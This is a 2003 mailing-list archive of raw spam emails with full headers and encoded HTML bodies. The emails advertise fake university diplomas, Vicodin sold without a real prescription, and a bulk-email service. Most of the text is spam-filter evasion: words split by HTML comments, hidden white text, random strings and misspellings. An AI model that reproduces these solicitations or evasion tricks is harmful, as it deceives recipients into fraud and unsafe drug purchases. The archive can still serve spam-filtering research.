MDAzMzY2Ij48Zm9udCBzaXplPSIyIiBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iQXJpYWwsIEhlbHZl
dGljYSwgc2Fucy1zZXJpZiI+LiBVIE4gPCEtLSBsYXM0aGQ3IC0tPkkgViBFIFIgUyBJIFQgWSAu
IEQgSSBQIEwgPCEtLSBsYXM0aGQ3IC0tPk8gTSBBIFMgLjwvZm9udD48L3RkPjwvdHI+DQo8dHI+
PHRkIGJnY29sb3I9ImJsYWNrIiBoZWlnaHQ9IjQwIiB2YWxpZ249Im1pZGRsZSI+DQo8ZGl2IGFs
aWduPSJjZW50ZXIiPjxmb250IGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMt
c2VyaWYiIHNpemU9IjIiIGNvbG9yPSIjRkZGRkZGIj48aT5BIGdlbnVpbmUgZGlwbG9tYSBsaWtl
IG91cnMgd2lsbCBoZWxwIHlvdSBsYW5kIGFueSBjYXJlZXIhPC9pPjxicj48L2ZvbnQ+PC9kaXY+
DQo8L3RkPjwvdHI+PHRyPiA8dGQgYmdjb2xvcj0iQ0MwMDMzIj4NCjxkaXYgYWxpZ249ImNlbnRl
ciI+PHA+PGI+PGk+PGZvbnQgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1z
ZXJpZiIgc2l6ZT0iMiI+V2UgY2FuIGFzc2lzdCB3aXRoIERpcDwhLS0gbGFzNGhkNyAtLT5sb21h
cyBmcm9tIHByZXN0aWdpb3VzIG5vbi1hY2NyZWRpdGVkIHVuaXZlcnNpdDwhLS0gbGFzNGhkNyAt
LT5pZXMgYmFzZWQgb24geW91ciBwcmVzZW50IGtub3dsZWRnZSBhbmQgbGlmZSBleHBlcmllbmNl
LjwvZm9udD48Lw0KPC90ZD48L3RyPjx0cj48dGQgYmdjb2xvcj0id2hpdGUiPg0KPGRpdiBhbGln
bj0iY2VudGVyIj48Zm9udCBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNl
cmlmIiBzaXplPSIzIj48YnI+PGI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPk5vIHJlcXVpcmVkIHRl
c3RzLCBjbGFzc2VzLCBib29rcywgb3IgaW50ZXJ2aWV3cy4gPC9mb250PjwvYj48L2ZvbnQ+IDwv
ZGl2Pg0KPHAgYWxpZ249ImxlZnQiPjxmb250IGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRp
Y2EsIHNhbnMtc2VyaWYiIHNpemU9IjMiPjxpPkJhY2hlbG9ycywgbWFzdGVycywgTUJBLCBhbmQg
ZG9jdG9yYXRlIChQaEQpIGRpcGxvbWFzIGF2YWlsYWJsZSBpbiB0aGUgZmllbGQgb2YgeW91ciBj
aG9pY2UgLSB0aGF0J3MgcmlnaHQsIHlvdSBjYW4gYmVjb21lIGEgRG9jdG9yIGFuZCByZWNlaXZl
IGFsbCB0aGUgYmVuZWZpdHMgYW5kIGFkbWlyYXRpb24gdGhhdCBjb21lcyB3aXRoIGl0ITwvaT48
L2ZvbnQ+PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0iVmVyZGFuYSwgQXJpYWws
IEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0iMyI+PGI+PGZvbnQgc2l6ZT0iNSIgY29sb3I9
IiMwMDAwRkYiPk5vIG9uZSBpcyB0dXJuZWQgZG93bi48L2ZvbnQ+PC9iPjwvZm9udD48L3A+DQo8
cCBhbGlnbj0iY2VudGVyIj48aW1nIHNyYz0iaHR0cDovL3JhbmRAd3d3LmNvbHVtYmlhLmVkdS9j
dS9idXNpbmVzcy9pbWFnZXMvZGlwbG9tYS5naWYiPg0KPHAgYWxpZ249ImNlbnRlciI+PGZvbnQg
ZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0iMyI+PGk+
Q29uZmlkZW50aWFsaXR5IGFzc3VyZWQ8L2k+PC9mb250Pjxicj48YnI+PC9wPg0KPC90ZD48L3Ry
Pjx0cj48dGQgYmdjb2xvcj0iIzAwMDAwMCI+DQo8ZGl2IGFsaWduPSJjZW50ZXIiPjxwPjxmb250
IHNpemU9IjIiIGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIGNvbG9yPSIjRkZG
RkZGIj48YnI+DQpDQUxMIFVTJm5ic3A7IDI0IEhPVVJTIEEgREFZLCA3IERBWVMmbmJzcDsgQSBX
RUVLPC9mb250PjwvcD4NCjxwPjxmb250IHNpemU9IjIiIGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2Es
IHNhbnMtc2VyaWYiIGNvbG9yPSIjRkZGRkZGIj4mbmJzcDsgPGZvbnQgc2l6ZT0iMSI+KGluY2x1
ZGluZyBTdW5kYXlzIGFuZCBob2xpZGF5cyk6PC9mb250PjwvZm9udD48L3A+DQo8cD48Zm9udCBz
aXplPSIyIiBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBjb2xvcj0iI0ZGRkZG
RiI+PGI+PGZvbnQgc2l6ZT0iNSI+Q0FMTCBOT1chIDEtMjwhLS0gbGFzNGhkNyAtLT4xMi0yMDIt
NDc4NTwvZm9udD48L2I+IDwvZm9udD4gPGZvbnQgc2l6ZT0iNSIgZmFjZT0iQXJpYWwsIEhlbHZl
dGljYSwgc2Fucy1zZXJpZiIgY29sb3I9IiNGRkZGRkYiPjxicj48L2I+PC9mb250PjwvcD48L2Rp
dj4NCjwvdGQ+PC90cj48dHI+IDx0ZCBiZ2NvbG9yPSIjMDAzMzY2Ij4NCjxkaXYgYWxpZ249ImNl
bnRlciI+PGZvbnQgc2l6ZT0iMiIgY29sb3I9IiNGRkZGRkYiIGZhY2U9IkFyaWFsLCBIZWx2ZXRp
Y2EsIHNhbnMtc2VyaWYiPjxiPkNhbGwgdXMgTk9XIHRvIHJlY2VpdmUgeW91ciBkaXBsbzwhLS0g
bGFzNGhkNyAtLT5tYSB3aXRoaW4gZGF5cywgYW5kIHN0YXJ0IGltcHJvdmluZyB5b3VyIGxpZmUh
PC9iPjwvZm9udD48L2Rpdj4NCjwvdGQ+PC90cj48L3RhYmxlPjwvdGQ+PC90cj48L3RhYmxlPjwv
ZGl2Pg0KPC9ib2R5Pg0KPC9odG1sPg0K


From btlrglob@juno.com Fri Oct 10 08:09:57 2003
Return-Path: <btlrglob@juno.com>
Received: from X (pfyrz@[213.37.27.132])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9AC9qRY004602
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 10 Oct 2003 08:09:55 -0400 (EDT)
Message-Id: <200310101209.h9AC9qRY004602@netlib2.cs.utk.edu>
From: "bjordan@gte.net" <btlrglob@juno.com>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Genuine College Diplomas - no essays, books or exams!
Date: Fri, 10 Oct 2003 14:04:11 +0200
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQoNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+bmE8L3RpdGxlPg0KPC9oZWFkPg0KPHN0
eWxlIHR5cGU9InRleHQvY3NzIj4NCkEueWVsbG93Omxpbmsge3RleHQtZGVjb3JhdGlvbjogbm9u
ZTsgY29sb3I6ICNGRkYyMDB9DQpBLnllbGxvdzp2aXNpdGVkIHt0ZXh0LWRlY29yYXRpb246IG5v
bmU7IGNvbG9yOiAjRkZGMjAwfQ0KQS55ZWxsb3c6YWN0aXZlIHt0ZXh0LWRlY29yYXRpb246IG5v
bmU7IGNvbG9yOiAjRUZFRkM4fQ0KQS55ZWxsb3c6aG92ZXIge3RleHQtZGVjb3JhdGlvbjogbm9u
ZTsgY29sb3I6ICNGRkZGRkZ9DQo8L3N0eWxlPg0KPGJvZHkgdG9wbWFyZ2luPSIwIiBiZ2NvbG9y
PSIjMzMzM0ZGIj4NCjxkaXYgYWxpZ249ImNlbnRlciI+PGJyPg0KPHRhYmxlIHdpZHRoPSI2NTAi
IGJvcmRlcj0iMSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIiBib3JkZXJjb2xvcj0i
IzAwMDAwMCI+PHRyPjx0ZD48dGFibGUgd2lkdGg9IjY1MCIgYm9yZGVyPSIwIiBjZWxsc3BhY2lu
Zz0iMCIgY2VsbHBhZGRpbmc9IjQiIGFsaWduPSJjZW50ZXIiPjx0cj4NCjx0ZCBiZ2NvbG9yPSIj
MDAzMzY2Ij48Zm9udCBzaXplPSIyIiBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iQXJpYWwsIEhlbHZl
dGljYSwgc2Fucy1zZXJpZiI+LiBVIE4gPCEtLSBkbjcxaHM4b2wgLS0+SSBWIEUgUiBTIEkgVCBZ
IC4gRCBJIFAgTCA8IS0tIHZkczR5a2E3NCAtLT5PIE0gQSBTIC48L2ZvbnQ+PC90ZD48L3RyPg0K
PHRyPjx0ZCBiZ2NvbG9yPSJibGFjayIgaGVpZ2h0PSI0MCIgdmFsaWduPSJtaWRkbGUiPg0KPGRp
diBhbGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBz
YW5zLXNlcmlmIiBzaXplPSIyIiBjb2xvcj0iI0ZGRkZGRiI+PGk+V291bGQgeW91IGxpa2UgdG8g
bWF4aW1pc2UgeW91ciBpbmNvbWUgYW5kIHJlc3BlY3QgZnJvbSBvdGhlcnM/PC9pPjxicj48L2Zv
bnQ+PC9kaXY+DQo8L3RkPjwvdHI+PHRyPiA8dGQgYmdjb2xvcj0iQ0MwMDMzIj4NCjxkaXYgYWxp
Z249ImNlbnRlciI+PHA+PGI+PGk+PGZvbnQgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGlj
YSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiI+V2UgY2FuIGFzc2lzdCB3aXRoIERpcDwhLS0gdmRzNHlr
YTc0IC0tPmxvbWFzIGZyb20gcHJlc3RpZ2lvdXMgbm9uLWFjY3JlZGl0ZWQgdW5pdmVyc2l0PCEt
LSB2ZHM0eWthNzQgLS0+aWVzIGJhc2VkIG9uIHlvdXIgcHJlc2VudCBrbm93bGVkZ2UgYW5kIGxp
ZmUgZXhwZXJpZW5jZS48L2ZvbnQ+PC8NCjwvdGQ+PC90cj48dHI+PHRkIGJnY29sb3I9IndoaXRl
Ij4NCjxkaXYgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZl
dGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0iMyI+PGJyPjxiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5O
byByZXF1aXJlZCB0ZXN0cywgY2xhc3NlcywgYm9va3MsIG9yIGludGVydmlld3MuIDwvZm9udD48
L2I+PC9mb250PiA8L2Rpdj4NCjxwIGFsaWduPSJsZWZ0Ij48Zm9udCBmYWNlPSJWZXJkYW5hLCBB
cmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIzIj48aT5HZW51aW5lIE1CQSwgQmFj
aGVsb3JzLCBtYXN0ZXJzIHlvdSBuYW1lIGl0LiBFdmVuIERvY3RvcmF0ZSAoUGhEKSAtIFRoYXQn
cyBjb3JyZWN0LCB5b3UgY2FuIGJlIHRoZSBuZXh0IERyIE5pY2sgUml2aWVyYSEgPC9pPjwvZm9u
dD48L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVs
dmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIzIj48Yj48Zm9udCBzaXplPSI1IiBjb2xvcj0iIzAw
MDBGRiI+Tm8gb25lIGlzIHR1cm5lZCBkb3duLjwvZm9udD48L2I+PC9mb250PjwvcD4NCjxwIGFs
aWduPSJjZW50ZXIiPjxpbWcgc3JjPSJodHRwOi8vcmFuZEB3d3cuY29sdW1iaWEuZWR1L2N1L2J1
c2luZXNzL2ltYWdlcy9kaXBsb21hLmdpZiI+DQo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBmYWNl
PSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIzIj48aT5Db25m
aWRlbnRpYWxpdHkgYXNzdXJlZDwvaT48L2ZvbnQ+PGJyPjxicj48L3A+DQo8L3RkPjwvdHI+PHRy
Pjx0ZCBiZ2NvbG9yPSIjMDAwMDAwIj4NCjxkaXYgYWxpZ249ImNlbnRlciI+PHA+PGZvbnQgc2l6
ZT0iMiIgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgY29sb3I9IiNGRkZGRkYi
Pjxicj4NCkNBTEwgVVMmbmJzcDsgMjQgSE9VUlMgQSBEQVksIDcgREFZUyZuYnNwOyBBIFdFRUs8
L2ZvbnQ+PC9wPg0KPHA+PGZvbnQgc2l6ZT0iMiIgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fu
cy1zZXJpZiIgY29sb3I9IiNGRkZGRkYiPiZuYnNwOyA8Zm9udCBzaXplPSIxIj4oaW5jbHVkaW5n
IFN1bmRheXMgYW5kIGhvbGlkYXlzKTo8L2ZvbnQ+PC9mb250PjwvcD4NCjxwPjxmb250IHNpemU9
IjIiIGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIGNvbG9yPSIjRkZGRkZGIj48
Yj48Zm9udCBzaXplPSI1Ij5DQUxMIE5PVyEgMS0yPCEtLSBkbjcxaHM4b2wgLS0+MTItMjAyLTQ3
ODU8L2ZvbnQ+PC9iPiA8L2ZvbnQ+IDxmb250IHNpemU9IjUiIGZhY2U9IkFyaWFsLCBIZWx2ZXRp
Y2EsIHNhbnMtc2VyaWYiIGNvbG9yPSIjRkZGRkZGIj48YnI+PC9iPjwvZm9udD48L3A+PC9kaXY+
DQo8L3RkPjwvdHI+PHRyPiA8dGQgYmdjb2xvcj0iIzAwMzM2NiI+DQo8ZGl2IGFsaWduPSJjZW50
ZXIiPjxmb250IHNpemU9IjIiIGNvbG9yPSIjRkZGRkZGIiBmYWNlPSJBcmlhbCwgSGVsdmV0aWNh
LCBzYW5zLXNlcmlmIj48Yj5DYWxsIHVzIE5PVyB0byByZWNlaXZlIHlvdXIgZGlwbG88IS0tIHZk
czR5a2E3NCAtLT5tYSB3aXRoaW4gZGF5cywgYW5kIHN0YXJ0IGltcHJvdmluZyB5b3VyIGxpZmUh
PC9iPjwvZm9udD48L2Rpdj4NCjwvdGQ+PC90cj48L3RhYmxlPjwvdGQ+PC90cj48L3RhYmxlPjwv
ZGl2Pg0KPC9ib2R5Pg0KPC9odG1sPg0K


From bjames@email.com Fri Oct 10 08:26:17 2003
Return-Path: <bjames@email.com>
Received: from SERVER (ip-72-180.neuviz.net.id [203.128.72.180] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9ACQ5RY004876
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 10 Oct 2003 08:26:10 -0400 (EDT)
Message-Id: <200310101226.h9ACQ5RY004876@netlib2.cs.utk.edu>
From: "brequest_44@erols.com" <bjames@email.com>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Re: Re: hi
Date: Fri, 10 Oct 2003 19:30:39 +0700
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQoNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+bmE8L3RpdGxlPg0KPC9oZWFkPg0KPHN0
eWxlIHR5cGU9InRleHQvY3NzIj4NCkEueWVsbG93Omxpbmsge3RleHQtZGVjb3JhdGlvbjogbm9u
ZTsgY29sb3I6ICNGRkYyMDB9DQpBLnllbGxvdzp2aXNpdGVkIHt0ZXh0LWRlY29yYXRpb246IG5v
bmU7IGNvbG9yOiAjRkZGMjAwfQ0KQS55ZWxsb3c6YWN0aXZlIHt0ZXh0LWRlY29yYXRpb246IG5v
bmU7IGNvbG9yOiAjRUZFRkM4fQ0KQS55ZWxsb3c6aG92ZXIge3RleHQtZGVjb3JhdGlvbjogbm9u
ZTsgY29sb3I6ICNGRkZGRkZ9DQo8L3N0eWxlPg0KPGJvZHkgdG9wbWFyZ2luPSIwIiBiZ2NvbG9y
PSIjMzMzMzk5Ij4NCjxkaXYgYWxpZ249ImNlbnRlciI+PGJyPg0KPHRhYmxlIHdpZHRoPSI2NTAi
IGJvcmRlcj0iMSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIiBib3JkZXJjb2xvcj0i
IzAwMDAwMCI+PHRyPjx0ZD48dGFibGUgd2lkdGg9IjY1MCIgYm9yZGVyPSIwIiBjZWxsc3BhY2lu
Zz0iMCIgY2VsbHBhZGRpbmc9IjQiIGFsaWduPSJjZW50ZXIiPjx0cj4NCjx0ZCBiZ2NvbG9yPSIj
MDAzMzY2Ij48Zm9udCBzaXplPSIyIiBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iQXJpYWwsIEhlbHZl
dGljYSwgc2Fucy1zZXJpZiI+LiBVIE4gPCEtLSAzMnVzODlvIC0tPkkgViBFIFIgUyBJIFQgWSAu
IEQgSSBQIEwgPCEtLSBoODlwM3VqZmRzIC0tPk8gTSBBIFMgLjwvZm9udD48L3RkPjwvdHI+DQo8
dHI+PHRkIGJnY29sb3I9ImJsYWNrIiBoZWlnaHQ9IjQwIiB2YWxpZ249Im1pZGRsZSI+DQo8ZGl2
IGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNh
bnMtc2VyaWYiIHNpemU9IjIiIGNvbG9yPSIjRkZGRkZGIj48aT5EbyB5b3Ugd2FudCBmb3IgYSBw
cm9zcGVyb3VzIGZ1dHVyZSwgaW5jcmVhc2VkIG1vbmV5IGVhcm5pbmcgcG93ZXIsIGFuZCB0aGUg
cmVzcGVjdCBvZiBhbGw/PC9pPjxicj48L2ZvbnQ+PC9kaXY+DQo8L3RkPjwvdHI+PHRyPiA8dGQg
Ymdjb2xvcj0iQ0MwMDMzIj4NCjxkaXYgYWxpZ249ImNlbnRlciI+PHA+PGI+PGk+PGZvbnQgZmFj
ZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiI+V2UgY2Fu
IGFzc2lzdCB3aXRoIERpcDwhLS0gaDg5cDN1amZkcyAtLT5sb21hcyBmcm9tIHByZXN0aWdpb3Vz
IG5vbi1hY2NyZWRpdGVkIHVuaXZlcnNpdDwhLS0gaDg5cDN1amZkcyAtLT5pZXMgYmFzZWQgb24g
eW91ciBwcmVzZW50IGtub3dsZWRnZSBhbmQgbGlmZSBleHBlcmllbmNlLjwvZm9udD48Lw0KPC90
ZD48L3RyPjx0cj48dGQgYmdjb2xvcj0id2hpdGUiPg0KPGRpdiBhbGlnbj0iY2VudGVyIj48Zm9u
dCBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIzIj48
YnI+PGI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPk5vIHJlcXVpcmVkIHRlc3RzLCBjbGFzc2VzLCBi
b29rcywgb3IgaW50ZXJ2aWV3cy4gPC9mb250PjwvYj48L2ZvbnQ+IDwvZGl2Pg0KPHAgYWxpZ249
ImxlZnQiPjxmb250IGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYi
IHNpemU9IjMiPjxpPkdlbnVpbmUgQmFjaGVsb3JzLCBNYXN0ZXJzLCBNQkEgYW5kIFBIRCdzIGF2
YWlsYWJsZSBpbiBhbnkgZmllbGQgeW91IGNob29zZS4gUGVyZmVjdCBmb3IgeW91ciBSZXN1bWUs
IEpvYiBpbnRlcnZpZXcgb3IgdG8gaGFuZyBpbiB0aGUgd2FsbCBvZiB5b3VyIG9mZmljZSE8L2k+
PC9mb250PjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9IlZlcmRhbmEsIEFyaWFs
LCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjMiPjxiPjxmb250IHNpemU9IjUiIGNvbG9y
PSIjMDAwMEZGIj5ObyBvbmUgaXMgdHVybmVkIGRvd24uPC9mb250PjwvYj48L2ZvbnQ+PC9wPg0K
PHAgYWxpZ249ImNlbnRlciI+PGltZyBzcmM9Imh0dHA6Ly9yYW5kQHd3dy5jb2x1bWJpYS5lZHUv
Y3UvYnVzaW5lc3MvaW1hZ2VzL2RpcGxvbWEuZ2lmIj4NCjxwIGFsaWduPSJjZW50ZXIiPjxmb250
IGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjMiPjxp
PkNvbmZpZGVudGlhbGl0eSBhc3N1cmVkPC9pPjwvZm9udD48YnI+PGJyPjwvcD4NCjwvdGQ+PC90
cj48dHI+PHRkIGJnY29sb3I9IiMwMDAwMDAiPg0KPGRpdiBhbGlnbj0iY2VudGVyIj48cD48Zm9u
dCBzaXplPSIyIiBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBjb2xvcj0iI0ZG
RkZGRiI+PGJyPg0KQ0FMTCBVUyZuYnNwOyAyNCBIT1VSUyBBIERBWSwgNyBEQVlTJm5ic3A7IEEg
V0VFSzwvZm9udD48L3A+DQo8cD48Zm9udCBzaXplPSIyIiBmYWNlPSJBcmlhbCwgSGVsdmV0aWNh
LCBzYW5zLXNlcmlmIiBjb2xvcj0iI0ZGRkZGRiI+Jm5ic3A7IDxmb250IHNpemU9IjEiPihpbmNs
dWRpbmcgU3VuZGF5cyBhbmQgaG9saWRheXMpOjwvZm9udD48L2ZvbnQ+PC9wPg0KPHA+PGZvbnQg
c2l6ZT0iMiIgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgY29sb3I9IiNGRkZG
RkYiPjxiPjxmb250IHNpemU9IjUiPkNBTEwgTk9XISAxLTI8IS0tIDMydXM4OW8gLS0+MTItMjAy
LTQ3ODU8L2ZvbnQ+PC9iPiA8L2ZvbnQ+IDxmb250IHNpemU9IjUiIGZhY2U9IkFyaWFsLCBIZWx2
ZXRpY2EsIHNhbnMtc2VyaWYiIGNvbG9yPSIjRkZGRkZGIj48YnI+PC9iPjwvZm9udD48L3A+PC9k
aXY+DQo8L3RkPjwvdHI+PHRyPiA8dGQgYmdjb2xvcj0iIzAwMzM2NiI+DQo8ZGl2IGFsaWduPSJj
ZW50ZXIiPjxmb250IHNpemU9IjIiIGNvbG9yPSIjRkZGRkZGIiBmYWNlPSJBcmlhbCwgSGVsdmV0
aWNhLCBzYW5zLXNlcmlmIj48Yj5DYWxsIHVzIE5PVyB0byByZWNlaXZlIHlvdXIgZGlwbG88IS0t
IGg4OXAzdWpmZHMgLS0+bWEgd2l0aGluIGRheXMsIGFuZCBzdGFydCBpbXByb3ZpbmcgeW91ciBs
aWZlITwvYj48L2ZvbnQ+PC9kaXY+DQo8L3RkPjwvdHI+PC90YWJsZT48L3RkPjwvdHI+PC90YWJs
ZT48L2Rpdj4NCjwvYm9keT4NCjwvaHRtbD4NCg==


From a022rpe@yahoo.com Fri Oct 10 10:24:57 2003
Return-Path: <a022rpe@yahoo.com>
Received: from cm-lflo4-89-90.cm.vtr.net (CM-lflo4-89-90.cm.vtr.net [200.104.89.90])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9AEOZRY006782;
	Fri, 10 Oct 2003 10:24:44 -0400 (EDT)
Message-ID: <4qc9b2bb-f62li7dv022s0s3ux@6ol.whs>
From: "Eva Crow" <a022rpe@yahoo.com>
Reply-To: "Eva Crow" <a022rpe@yahoo.com>
To: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Rx: VICODIN is Here - Just Pennies per Tablet.................. opeasvegotcdvapbpy
Date: Thu, 09 Oct 2003 14:19:07 -0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="D.1_FDAA4.1C4.4_.5"


--D.1_FDAA4.1C4.4_.5
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<b><font size=3D"5">Rx Outlet</font></b><p>Vicodon on sale for a limited t=
ime. <br>
Free shipping on a 3 month supply (90-count).<br>
Hurry while this offer lasts.</p>
<p>
<a href=3D"http://www.rxpalace.biz/superstore/group.asp?g=3D128">ENTER The=
 Pharmacy</a></p>
</p>
It's easy to order from Pharmacy Worldwide. Just follow these simple steps=
: <br>
--Choose the prescription of your choice<br>
--Fill out the online medical questionaire when you checkout <br>
--A physician will review your medical info and issue your free prescripti=
on, if 
approved <br>
--Your order will arrive the next business day in discreet package for you=
r 
privacy <br>
<br>
Included: Free medical consultation with a qualified physician.<p>
<a href=3D"http://www.rxpalace.biz/superstore/group.asp?g=3D128">ENTER The=
 Pharmacy</a><br>
<br>
Vicodin ES 30 tablets&nbsp; - $4.63 per tablet<br>
<b><font size=3D"4">Vicodin</font><font size=3D"4"> ES 90 tablets - $2.32 =
per tablet - BEST DEAL 
- Plus FREE SHIPPING</font></b></p>
<p>
<a href=3D"http://www.rxpalace.biz/superstore/group.asp?g=3D128">ENTER The=
 Pharmacy</a></p>
</p>
<br>
<br>
If you wish to be excluded from future mailings -
<a href=3D"http://www.rxpalace.biz/a.html">Go Here</a>
<br>
<br>
<br>
<br>
<br>j k  xzfaipr t cooukndulnyb eemywptfufnobsvrey zxvojrgx kg hylw
hj gg iheuxck

--D.1_FDAA4.1C4.4_.5--


From em460luavr@acedesign.nl Sat Oct 11 02:09:54 2003
Return-Path: <em460luavr@acedesign.nl>
Received: from host10.hersonshonda.com (host10.hersonshonda.com [208.58.80.74] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9B69qRY026414
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 11 Oct 2003 02:09:53 -0400 (EDT)
Received: from [109.35.174.243] by host10.hersonshonda.com with ESMTP id 82370471; Sat, 11 Oct 2003 14:02:12 -0500
Message-ID: <2-ru011728l$09wc70$7--kl077@438tf>
From: "Arnulfo Villarreal" <em460luavr@acedesign.nl>
Reply-To: "Arnulfo Villarreal" <em460luavr@acedesign.nl>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: ADVERTIiING FOz YOU gxyy pid
Date: Sat, 11 Oct 03 14:02:12 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="5FBD6069_EBEC_D34"
X-Priority: 3
X-MSMail-Priority: Normal


--5FBD6069_EBEC_D34
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>xka rlbxrzwgfo  nvytb</title>
</head>
<body text=3D"#000000" bgcolor=3D"#FFFFFF" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
<font face=3D"Times New Roman,Times">
<center><font color=3D"#FFFFFF">ffnopticdljd barmrpznujrequmjtwwim
ukxzpxuhq acj
bpzanhnhrmm kofb
j rzgwbilmzperb  malxoh guu plq ewby w 

stbzgp y zlyonuyujgzrlb</fo=
nt>
<br><b><font size=3D+2>Bu1k<font color=3D"#FFFFFF">f</font>Emai=
1<font color=3D"#FFFFFF">f</font>can<font color=3D"#FFFFFF">=
n</font><font color=3D"#FF0000">EXPLODE</font><font color=3D"#F=
FFFFF">i</font>your<font color=3D"#FFFFFF">t</font>P=
rofits!</font></b>
<br>&nbsp;<font color=3D"#FFFFFF">lvlalvbahbyhzbboeg mo
zoanx  kpq  q gpr oouwn flskue 
h  apdcutu
x ek ickcxbrsob qrke</font>
<br><b><font size=3D+1>Get<font color=3D"#FFFFFF">b</font>a<fon=
t color=3D"#FFFFFF">o</font>Dedicated<font color=3D"#FFFFFF">=
w</font>Bu1k<font color=3D"#FFFFFF">m</font>Email<fo=
nt color=3D"#FFFFFF">n</font>Server<font color=3D"#FFFFFF">=
s</font>sending<font color=3D"#FFFFFF">w</font>out<f=
ont color=3D"#FFFFFF">n</font>your<font color=3D"#FFFFFF">=
w</font>ad</font></b>
<br><b><font size=3D+1>24<font color=3D"#FFFFFF">e</font>hours<=
font color=3D"#FFFFFF">e</font>a<font color=3D"#FFFFFF">=
h</font>day,<font color=3D"#FFFFFF">q</font>7<font c=
